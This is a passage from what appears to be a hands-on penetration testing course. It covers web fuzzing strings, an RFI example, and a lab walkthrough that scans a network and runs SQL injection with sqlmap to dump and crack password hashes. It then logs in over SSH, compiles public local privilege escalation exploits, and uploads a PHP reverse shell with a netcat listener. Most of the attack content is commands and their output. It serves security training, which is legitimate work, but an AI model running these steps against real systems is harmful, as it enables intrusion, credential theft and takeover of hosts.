  830. - Now we can attack the target via RFI like this:
  831. -------------------------Paste this into Firefox-----------------------------------
  832. http://45.63.104.73/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
  833. -------------------------------------------------------------------------------------
  834.  
  835.  
  836.  
  837. ###############################
  838. # How much fuzzing is enough? #
  839. ###############################
  840. There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
  841.  
  842. Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
  843.  
  844.  
  845. Step 1: Ask yourself the 3 questions per page of the site.
  846.  
  847. Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
  848.  
  849. Step 3: When you load your fuzz strings - use the following decision tree
  850.  
  851. - Are the fuzz strings causing a default error message (example 404)?
  852. - If this is the case then it is most likely NOT vulnerable
  853.  
  854. - Are the fuzz strings causing a WAF or LB custom error message?
  855. - If this is the case then you need to find an encoding method to bypass
  856.  
  857.  
  858. - Are the fuzz strings causing an error message that discloses the backend type?
  859. - If yes, then identify DB type and find correct syntax to successfully exploit
  860. - Some example strings that I use are:
  861. '
  862. "
  863. () <----- Take the parameter value and put it in parenthesis
  864. (5-1) <----- See if you can perform an arithmetic function
  865.  
  866.  
  867. - Are the fuzz strings rendering executable code?
  868. - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
  869. - Some example strings that I use are:
  870. <b>hello</b>
  871. <u>hello</u>
  872. <script>alert(123);</script>
  873. <script>alert(xss);</script>
  874. <script>alert('xss');</script>
  875. <script>alert("xss");</script>
  876.  
  877.  
  878. ###############################################################
  879. # Question 1: What is the process that you use when you test? #
  880. ###############################################################
  881.  
  882. Step 1: Automated Testing
  883.  
  884. Step 1a: Web Application vulnerability scanners
  885. -----------------------------------------------
  886. - Run two (2) unauthenticated vulnerability scans against the target
  887. - Run two (2) authenticated vulnerability scans against the target with low-level user credentials
  888. - Run two (2) authenticated vulnerability scans against the target with admin privileges
  889.  
  890. The web application vulnerability scanners that I use for this process are (HP Web Inspect, and Acunetix).
  891.  
  892. A good web application vulnerability scanner comparison website is here:
  893. http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html
  894.  
  895.  
  896. Look to see if there are cases where both scanners identify the same vulnerability. Investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
  897.  
  898. When you run into cases where one (1) scanner identifies a vulnerability that the other scanner does not you should still investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
  899.  
  900.  
  901. Be sure to look for scans that take more than 3 or 4 hours as your scanner may have lost its active session and is probably not actually finding real vulnerabilities anymore.
  902.  
  903.  
  904. Also, be sure to save the scan results and logs. I usually provide this data to the customer.
  905.  
  906.  
  907.  
  908. Step 1b: Directory Brute Forcer
  909. -------------------------------
  910. I like to run DirBuster or a similar tool. This is great to find hidden gems (backups of the website, information leakage, unreferenced files, dev sites, etc).
  911.  
  912.  
  913.  
  914. Step 2: Manual Testing
  915.  
  916. Try to do this step while your automated scans are running. Use Burp Suite or the Tamper Data Firefox extension to browse EVERY PAGE of the website (if this is realistic).
  917.  
  918. Step 2a: Spider/Scan the entire site with Burp Suite
  919. Save the spider and scan results. I usually provide this data to the customer as well.
  920.  
  921.  
  922. Step 2b: Browse through the site using the 3 question method
  923. Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes - be sure to look at that individual web request in the target section of Burp Suite, right-click on that particular request and choose 'Send to Intruder'.
  924.  
  925. Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload is to be sure to send the payload both with and without the parameter value.
  926.  
  927. Here is what I mean:
  928. http://www.site.com/page.aspx?parametername=parametervalue
  929.  
  930. When you are looking at an individual request - often times Burp Suite will insert the payload in place of the parameter value like this:
  931.  
  932. http://www.site.com/page.aspx?parametername=[ payload ]
  933.  
  934. You need to ensure that you send the payload this way, and like this below:
  935.  
  936. http://www.site.com/page.aspx?parametername=parametervalue[ payload ]
  937.  
  938. This little hint will pay huge dividends in actually EXPLOITING the vulnerabilities you find instead of just identifying them.
  939.  
  940.  
  941.  
  942.  
  943.  
  944.  
  945.  
  946. ###########################################
  947. # Question 2: How much fuzzing is enough? #
  948. ###########################################
  949. There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
  950.  
  951. Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
  952.  
  953.  
  954. Step 1: Ask yourself the 3 questions per page of the site.
  955.  
  956. Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
  957.  
  958. Step 3: When you load your fuzz strings - use the following decision tree
  959.  
  960. - Are the fuzz strings causing a default error message (example 404)?
  961. - If this is the case then it is most likely NOT vulnerable
  962.  
  963. - Are the fuzz strings causing a WAF or LB custom error message?
  964. - If this is the case then you need to find an encoding method to bypass
  965.  
  966.  
  967. - Are the fuzz strings causing an error message that discloses the backend type?
  968. - If yes, then identify DB type and find correct syntax to successfully exploit
  969. - Some example strings that I use are:
  970. '
  971. "
  972. () <----- Take the parameter value and put it in parenthesis
  973. (5-1) <----- See if you can perform an arithmetic function
  974.  
  975.  
  976. - Are the fuzz strings rendering executable code?
  977. - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
  978. - Some example strings that I use are:
  979. <b>hello</b>
  980. <u>hello</u>
  981. <script>alert(123);</script>
  982. <script>alert(xss);</script>
  983. <script>alert('xss');</script>
  984. <script>alert("xss");</script>
  985.  
  986.  
  987.  
  988.  
  989.  
  990.  
  991.  
  992. -------------------------------------------------------------------------------------------
  993. OWASP Top 10 Video Explanations
  994.  
  995. Burp Suite Reference:
  996. https://support.portswigger.net/customer/portal/articles/1969845-using-burp-to-test-for-the-owasp-top-ten
  997.  
  998. A1: Injection Vulnerabilities
  999. https://www.youtube.com/watch?v=9CnpHT5Nn8c&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj
  1000.  
  1001.  
  1002. A2: Broken Authentication and Session Management
  1003. https://www.youtube.com/watch?v=R1iGRBG3PJ8&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=2
  1004.  
  1005. A3: Cross Site Scripting (XSS)
  1006. https://www.youtube.com/watch?v=90XT0j5E7xo&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=4
  1007.  
  1008. A4: Insecure Direct Object Reference
  1009. https://www.youtube.com/watch?v=bMYpGj2xzpM&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=5
  1010.  
  1011.  
  1012. A5: Security Misconfiguration
  1013. https://www.youtube.com/watch?v=ouuXu9_UM0w&index=7&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj
  1014.  
  1015.  
  1016. A6: Sensitive Data Exposure
  1017. https://www.youtube.com/watch?v=x-B8I420x7Y&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=8
  1018.  
  1019.  
  1020. A7: Missing Function Level Access Control and A8 Cross-Site Request Forgery (CSRF)
  1021. https://www.youtube.com/watch?v=gf6cb7MnP-c&index=9&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj
  1022.  
  1023. A9 Using Components w/ Known Vulnerabilities & A10 Unvalidated Redirects and Forwards
  1024. https://www.youtube.com/watch?v=WqlSl-Pc1vk&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=10
  1025.  
  1026.  
  1027.  
  1028. ###########################
  1029. ----------- ############### # Day 3: Attack Lab Hosts # ############### -----------
  1030. ###########################
  1031.  
  1032. To connect to the VPN open a web browser on your host machine (not your virtual machine) and go to the following URL:
  1033. https://54.245.178.32/?src=connect
  1034.  
  1035.  
  1036. Accept the security exception and enter one of the following user names:
  1037.  
  1038. hca001
  1039. hca002
  1040. hca003
  1041. hca004
  1042. hca005
  1043. hca006
  1044. hca007
  1045. hca008
  1046. hca009
  1047. hca010
  1048. hca011
  1049. hca012
  1050. hca013
  1051. hca014
  1052. hca015
  1053. hca016
  1054. hca017
  1055. hca018
  1056. hca019
  1057.  
  1058.  
  1059. password: *************
  1060.  
  1061.  
  1062. target network range: 172.31.2.0/24
  1063.  
  1064.  
  1065.  
  1066.  
  1067. ##############################
  1068. # Scanning Process to follow #
  1069. ##############################
  1070.  
  1071. Step 1: Host Discovery
  1072. ----------------------
  1073.  
  1074. ---------------------------Type This-----------------------------------
  1075. nmap -sP 172.31.2.0/24
  1076.  
  1077. nmap -sL 172.31.2.0/24
  1078.  
  1079. nmap -sS --open -p 22,445 172.31.2.0/24
  1080.  
  1081.  
  1082. cd ~/toolz
  1083. wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
  1084. gcc propecia.c -o propecia
  1085. sudo cp propecia /bin
  1086.  
  1087. propecia 172.31.2 22 > file1
  1088. propecia 172.31.2 445 > file2
  1089. cat file1 file2 > file3
  1090. cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
  1091. cat lab.txt
  1092. -----------------------------------------------------------------------
  1093.  
  1094.  
  1095.  
  1096.  
  1097. Step 2: Service Discovery
  1098. -------------------------
  1099. nmap -sS <IP-ADDRESS>
  1100. nmap -sU -p 69,161 <IP-ADDRESS>
  1101.  
  1102.  
  1103. ---------------------------Type This-----------------------------------
  1104. sudo nmap -sS 172.31.2.0/24
  1105. sudo nmap -sU -p 69,161 172.31.2.0/24
  1106. -----------------------------------------------------------------------
  1107.  
  1108.  
  1109.  
  1110. Step 3: Service Version Discovery
  1111. ---------------------------------
  1112. nmap -sV <IP-ADDRESS>
  1113. nmap -sV -p- <IP-ADDRESS>
  1114. |
  1115. ----> Vulnerability Research
  1116.  
  1117. ---------------------------Type This-----------------------------------
  1118. sudo nmap -sV 172.31.2.0/24
  1119. -----------------------------------------------------------------------
  1120.  
  1121. Step 4: Enumerate common Windows/Linux file sharing services
  1122. Step 3 is where most people STOP, and you need to move on and look deeper
  1123. ------------------------------------------------------------
  1124.  
  1125. ---------------------------Type This-----------------------------------
  1126. cd ~/toolz
  1127. sudo apt install smbclient libnss-winbind winbind
  1128. git clone https://github.com/portcullislabs/enum4linux.git
  1129. cd enum4linux/
  1130. perl enum4linux.pl -U 172.31.2.11
  1131.  
  1132. nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 172.31.2.86
  1133. ---------------------------------------------------------------------------------------
  1134.  
  1135.  
  1136.  
  1137.  
  1138.  
  1139.  
  1140.  
  1141. Identify webservers
  1142. -------------------
  1143. ---------------------------Type This-----------------------------------
  1144. cd ~
  1145.  
  1146. propecia 172.31.2 22
  1147.  
  1148. propecia 172.31.2 80
  1149.  
  1150. propecia 172.31.2 443
  1151.  
  1152. propecia 172.31.2 3389
  1153.  
  1154. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | grep open
  1155.  
  1156. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2 " " $3}'
  1157.  
  1158. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2}' | wc -l
  1159.  
  1160. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2}'
  1161.  
  1162. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt
  1163.  
  1164. cat ~/labnet-ip-list.txt
  1165. ---------------------------------------------------------------------------------------
  1166.  
  1167.  
  1168. #################################################
  1169. # Screenshotting the Web Servers in the Network #
  1170. #################################################
  1171.  
  1172. ---------------------------Type This-----------------------------------
  1173. cd ~/toolz/
  1174. mkdir labscreenshots
  1175. cd labscreenshots/
  1176.  
  1177.  
  1178. wget http://45.63.104.73/wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
  1179. tar xf wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
  1180. cd wkhtmltox/bin/
  1181. sudo cp wkhtmltoimage /usr/local/bin/wkhtmltoimage-i386
  1182.  
  1183.  
  1184. cd ~/toolz/
  1185. git clone git://github.com/SpiderLabs/Nmap-Tools.git
  1186. cd Nmap-Tools/NSE/
  1187.  
  1188. sudo cp http-screenshot.nse /usr/share/nmap/scripts/
  1189. strategicsec
  1190.  
  1191. sudo nmap --script-updatedb
  1192. strategicsec
  1193.  
  1194.  
  1195. cd ~/toolz/labscreenshots/
  1196. sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 172.31.2.0/24 -iL ~/labnet-ip-list.txt
  1197. strategicsec
  1198. ---------------------------------------------------------------------------------------
  1199.  
  1200.  
  1201. ---------------------------Type This-----------------------------------
  1202. nano screenshots.sh
  1203. ---------------------------------------------------------------------------------------
  1204.  
  1205. ---------------------------Paste This into the file screenshots.sh-----------------------------------
  1206. #!/bin/bash
  1207. printf "<HTML><BODY><BR>" > labnet-port-80-screenshots.html
  1208. ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html
  1209. printf "</BODY></HTML>" >> labnet-port-80-screenshots.html
  1210. ---------------------------------------------------------------------------------------
  1211.  
  1212.  
  1213.  
  1214. ---------------------------Type This-----------------------------------
  1215. chmod +x screenshots.sh
  1216.  
  1217. sh screenshots.sh
  1218.  
  1219. python -m SimpleHTTPServer
  1220. ---------------------------------------------------------------------------------------
  1221.  
  1222. --- Now browse to the IP of your Linux machine on port 8000 (http://Ubuntu-VM-IP:8000/labnet-port-80-screenshots.html):
  1223. http://192.168.150.131:8000/labnet-port-80-screenshots.html
  1224.  
  1225.  
  1226.  
  1227.  
  1228. ##########################
  1229. # Nmap NSE tricks to try #
  1230. ##########################
  1231. ---------------------------Type This-----------------------------------
  1232. sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 172.31.2.0/24
  1233. strategicsec
  1234.  
  1235. sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 172.31.2.0/24
  1236. strategicsec
  1237.  
  1238. sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 172.31.2.0/24
  1239. strategicsec
  1240.  
  1241. sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 172.31.2.0/24
  1242. strategicsec
  1243.  
  1244. sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 172.31.2.0/24
  1245. strategicsec
  1246.  
  1247. sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 172.31.2.0/24
  1248. strategicsec
  1249.  
  1250. sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 172.31.2.0/24
  1251. strategicsec
  1252.  
  1253. sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 172.31.2.0/24
  1254. strategicsec
  1255.  
  1256. sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 172.31.2.0/24
  1257. strategicsec
  1258.  
  1259. sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 172.31.2.0/24
  1260. strategicsec
  1261.  
  1262. sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 172.31.2.0/24
  1263. strategicsec
  1264.  
  1265. sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 172.31.2.0/24
  1266. strategicsec
  1267.  
  1268.  
  1269. sudo nmap -sV -oA nse --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" 172.31.2.0/24
  1270. strategicsec
  1271. ---------------------------------------------------------------------------------------
  1272.  
  1273.  
  1274.  
  1275.  
  1276.  
  1277.  
  1278. Vulnerability scan the webserver ports
  1279. ---------------------------Type This-----------------------------------
  1280. cd ~/toolz/
  1281.  
  1282. rm -rf nikto*
  1283.  
  1284. git clone https://github.com/sullo/nikto.git Nikto2
  1285.  
  1286. cd Nikto2/program
  1287.  
  1288. perl nikto.pl -h 172.31.2.86
  1289.  
  1290. perl nikto.pl -h 172.31.2.86:8080
  1291. -----------------------------------------------------------------------
  1292.  
  1293.  
  1294.  
  1295.  
  1296.  
  1297. Step 4: Perform directory bruteforce against the target host
  1298. ---------------------------Type This-----------------------------------
  1299. wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
  1300.  
  1301. perl Webr00t.pl -h 172.31.2.86 -v
  1302. -----------------------------------------------------------------------
  1303.  
  1304.  
  1305.  
  1306. or with dirbuster (dirb)
  1307.  
  1308.  
  1309.  
  1310.  
  1311. ---------------------------Type This-----------------------------------
  1312. cd ~/toolz
  1313.  
  1314. git clone https://github.com/v0re/dirb.git
  1315.  
  1316. cd dirb/
  1317.  
  1318. ./configure
  1319.  
  1320. make
  1321.  
  1322. dirb
  1323.  
  1324. ./dirb http://172.31.2.86 wordlists/big.txt
  1325. -----------------------------------------------------------------------
  1326.  
  1327. ### dirb output ###
  1328. ==> DIRECTORY: http://172.31.2.86/blocks/
  1329. ==> DIRECTORY: http://172.31.2.86/files/
  1330. ==> DIRECTORY: http://172.31.2.86/modules/
  1331. ==> DIRECTORY: http://172.31.2.86/system/
  1332. ==> DIRECTORY: http://172.31.2.86/themes/
  1333.  
  1334. + http://172.31.2.86/robots.txt (CODE:200|SIZE:36)
  1335. + http://172.31.2.86/server-status (CODE:403|SIZE:291)
  1336. ### dirb output ###
  1337.  
  1338.  
  1339.  
  1340.  
  1341.  
  1342. Browsed each of the directories and found that inside of the /themes folder contained the vulnerable application Builder Engine 3.5.0
  1343.  
  1344. An exploit for this application can be found at:
  1345. https://www.exploit-db.com/exploits/40390/
  1346.  
  1347.  
  1348.  
  1349.  
  1350.  
  1351. -------------------save this a "BuilderEngine.html"-------------------
  1352. <html>
  1353. <body>
  1354. <form method="post" action="http://172.31.2.86/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
  1355.  
  1356. enctype="multipart/form-data">
  1357. <input type="file" name="files[]" />
  1358. <input type="submit" value="send" />
  1359. </form>
  1360. </body>
  1361. </html>
  1362. -----------------------------------------------------------------------
  1363.  
  1364.  
  1365. Download this webshell (http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz) to your local machine.
  1366.  
  1367. Change the IP address in the source code of the webshell to another server in the lab network that you have root access to.
  1368.  
  1369. On the other server run:
  1370. nc -lvp 1234
  1371.  
  1372. Then upload the pentestmonkey reverseshell to .86
  1373.  
  1374. ============================================ Attacking another server because I need a reverse shell =========================================
  1375.  
  1376.  
  1377.  
  1378. ============================================ Attacking another server because I need a reverse shell =========================================
  1379. ---------------------------------------------------------------------------------------------------------------------------------------------------------
  1380.  
  1381. Attack steps:
  1382. -------------
  1383.  
  1384.  
  1385.  
  1386. Step 1: Ping sweep the target network
  1387. -------------------------------------
  1388.  
  1389.  
  1390. ---------------------------Type This-----------------------------------
  1391. nmap -sP 172.31.2.0/24
  1392. -----------------------------------------------------------------------
  1393.  
  1394.  
  1395.  
  1396. - Found 3 hosts
  1397. 172.31.2.64
  1398. 172.31.2.217
  1399. 172.31.2.238
  1400.  
  1401.  
  1402.  
  1403. Step 2: Port scan target system
  1404. -------------------------------
  1405.  
  1406.  
  1407. ---------------------------Type This-----------------------------------
  1408. nmap -sV 172.31.2.64
  1409. -----------------------------------------------------------------------
  1410.  
  1411.  
  1412.  
  1413. -------------Scan Results--------------------------------------------
  1414. PORT STATE SERVICE VERSION
  1415. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
  1416. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  1417. 514/tcp filtered shell
  1418. 1037/tcp filtered ams
  1419. 6667/tcp open irc ngircd
  1420. Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  1421. --------------------------------------------------------------------
  1422.  
  1423.  
  1424. Step 3: Vulnerability Scan the webserver
  1425. ----------------------------------------
  1426.  
  1427.  
  1428. ---------------------------Type This-----------------------------------
  1429. cd ~/toolz/
  1430.  
  1431. rm -rf nikto*
  1432.  
  1433. git clone https://github.com/sullo/nikto.git Nikto2
  1434.  
  1435. cd Nikto2/program
  1436.  
  1437. perl nikto.pl -h 172.31.2.64
  1438. -----------------------------------------------------------------------
  1439.  
  1440.  
  1441. Step 4: Run dirbuster or similar directory bruteforce tool against the target
  1442. -----------------------------------------------------------------------------
  1443.  
  1444.  
  1445. ---------------------------Type This-----------------------------------
  1446. wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
  1447.  
  1448. perl Webr00t.pl -h 172.31.2.64 -v
  1449. -----------------------------------------------------------------------
  1450. or with dirbuster (dirb)
  1451.  
  1452. ---------------------------Type This-----------------------------------
  1453. git clone https://github.com/v0re/dirb.git
  1454.  
  1455. cd dirb/
  1456.  
  1457. ./configure
  1458.  
  1459. make
  1460.  
  1461. dirb
  1462.  
  1463. ./dirb http://172.31.2.64 wordlists/big.txt
  1464. -----------------------------------------------------------------------
  1465.  
  1466.  
  1467.  
  1468. Step 5: Browse the web site to look for clues
  1469. ---------------------------------------------
  1470. Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
  1471.  
  1472.  
  1473. ..... really didn't get much from here so we just opened the web page in a browser
  1474. http://172.31.2.64/
  1475.  
  1476. .....browsed to the webpage and saw that it pointed to:
  1477. http://172.31.2.64/jabc
  1478.  
  1479. ....clicked on documentation link and found hidden text that pointed to here:
  1480. http://172.31.2.64/jabcd0cs/
  1481.  
  1482. ....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
  1483. https://www.exploit-db.com/exploits/32075/
  1484.  
  1485. Tried the sql injection described in exploit-db:
  1486. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
  1487.  
  1488. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9
  1489.  
  1490.  
  1491.  
  1492. Tried to run sqlmap against the target
  1493.  
  1494.  
  1495. ---------------------------Type This-----------------------------------
  1496. cd sqlmap-dev/
  1497. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql
  1498.  
  1499. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql
  1500.  
  1501. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql
  1502.  
  1503. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql
  1504.  
  1505. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
  1506. -----------------------------------------------------------------------
  1507.  
  1508.  
  1509.  
  1510. FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
  1511. FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net
  1512.  
  1513.  
  1514.  
  1515. ---------------------------Type This-----------------------------------
  1516. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql
  1517.  
  1518. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
  1519. -----------------------------------------------------------------------
  1520.  
  1521. username: webmin
  1522. hash: b78aae356709f8c31118ea613980954b
  1523.  
  1524. https://hashkiller.co.uk/md5-decrypter.aspx
  1525.  
  1526. hash: b78aae356709f8c31118ea613980954b
  1527. pass: webmin1980
  1528.  
  1529.  
  1530. ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.
  1531.  
  1532.  
  1533.  
  1534. ---------------------------Type This-----------------------------------
  1535. ssh -l webmin 172.31.2.64
  1536. webmin1980
  1537.  
  1538. id
  1539.  
  1540. cat /etc/*release
  1541. -----------------------------------------------------------------------
  1542.  
  1543.  
  1544.  
  1545. ....tired of not having a real command shell...
  1546.  
  1547.  
  1548. ---------------------------Type This-----------------------------------
  1549. python -c 'import pty;pty.spawn("/bin/bash")'
  1550.  
  1551.  
  1552. cd /tmp
  1553.  
  1554. pwd
  1555.  
  1556.  
  1557. cat >> exploit.c << out
  1558.  
  1559. **************paste in the content from here *****************
  1560. https://www.exploit-db.com/raw/39166/
  1561.  
  1562.  
  1563. ------ hit enter a few times ------
  1564.  
  1565. ------ then type 'out' ----- this closes the file handle...
  1566.  
  1567.  
  1568.  
  1569. ---------------------------Type This-----------------------------------
  1570. gcc -o boom exploit.c
  1571.  
  1572. ./boom
  1573. -----------------------------------------------------------------------
  1574.  
  1575.  
  1576. ------------exploit failed, damn let's try another one ---------
  1577.  
  1578.  
  1579.  
  1580. ---------------------------Type This-----------------------------------
  1581. cat >> exploit2.c << out
  1582.  
  1583. **************paste in the content from here *****************
  1584. https://www.exploit-db.com/raw/37292/
  1585.  
  1586.  
  1587. out
  1588.  
  1589.  
  1590. gcc -o boom2 exploit2.c
  1591.  
  1592. ./boom2
  1593.  
  1594. id
  1595.  
  1596.  
  1597. ......YEAH - do the happy dance!!!!
  1598. =============================================== Now back to the previous server ==============================================================
  1599.  
  1600.  
  1601.  
  1602. #####################################
  1603. # Writing Your Own Nmap NSE Scripts #
  1604. #####################################
  1605.  
  1606.  
  1607. ---------------------------Type This-----------------------------------
  1608. sudo nano /usr/share/nmap/scripts/intro-nse.nse
  1609. ----------------------------------------------------------------------
  1610.  
  1611. ---------------------------Paste This into the file intro-nse.nse-----------------------------------
  1612. -- The Head Section --
  1613. -- The Rule Section --
  1614. portrule = function(host, port)
  1615. return port.protocol == "tcp"
  1616. and port.number == 80
  1617. and port.state == "open"
  1618. end
  1619.  
  1620. -- The Action Section --
  1621. action = function(host, port)
  1622. return "HCA!"
  1623. end
  1624. ----------------------------------------------------------------------
  1625.  
  1626. - Ok, now that we've made that change let's run the script
  1627. ---------------------------Type This-----------------------------------
  1628. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443
  1629. ----------------------------------------------------------------------
  1630.  
  1631.  
  1632.  
  1633.  
  1634.  
  1635. ---------------------------Type This-----------------------------------
  1636. sudo nano /usr/share/nmap/scripts/intro-nse.nse
  1637. ----------------------------------------------------------------------
  1638.  
  1639. ---------------------------Paste This into the file intro-nse.nse-----------------------------------
  1640. -- The Head Section --
  1641. local shortport = require "shortport"
  1642.  
  1643. -- The Rule Section --
  1644. portrule = shortport.http
  1645.  
  1646.  
  1647. -- The Action Section --
  1648. action = function(host, port)
  1649. return "HCA!"
  1650. end
  1651. ----------------------------------------------------------------------
  1652.  
  1653. - Ok, now that we've made that change let's run the script
  1654. ---------------------------Type This-----------------------------------
  1655. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443
  1656. ----------------------------------------------------------------------
  1657.  
  1658.  
  1659.  
  1660.  
  1661.  
  1662.  
  1663. OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year.
  1664.  
  1665. ---------------------------Type This-----------------------------------
  1666. sudo nano /usr/share/nmap/scripts/intro-nse.nse
  1667. ----------------------------------------------------------------------
  1668.  
  1669. ---------------------------Paste This into the file intro-nse.nse-----------------------------------
  1670. -- The Head Section --
  1671. local shortport = require "shortport"
  1672. local http = require "http"
  1673.  
  1674. -- The Rule Section --
  1675. portrule = shortport.http
  1676.  
  1677. -- The Action Section --
  1678. action = function(host, port)
  1679.  
  1680. local uri = "/installing-metasploit-in-ubunt/"
  1681. local response = http.get(host, port, uri)
  1682. return response.status
  1683.  
  1684. end
  1685. ----------------------------------------------------------------------
  1686.  
  1687. - Ok, now that we've made that change let's run the script
  1688. ---------------------------Type This-----------------------------------
  1689. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  1690. ----------------------------------------------------------------------
  1691.  
  1692.  
  1693.  
  1694. ---------------------------Type This-----------------------------------
  1695. sudo nano /usr/share/nmap/scripts/intro-nse.nse
  1696. ----------------------------------------------------------------------
  1697.  
  1698. ---------------------------Paste This into the file intro-nse.nse-----------------------------------
  1699. -- The Head Section --
  1700. local shortport = require "shortport"
  1701. local http = require "http"
  1702.  
  1703. -- The Rule Section --
  1704. portrule = shortport.http
  1705.  
  1706. -- The Action Section --
  1707. action = function(host, port)
  1708.  
  1709. local uri = "/installing-metasploit-in-ubunt/"
  1710. local response = http.get(host, port, uri)
  1711.  
  1712. if ( response.status == 200 ) then
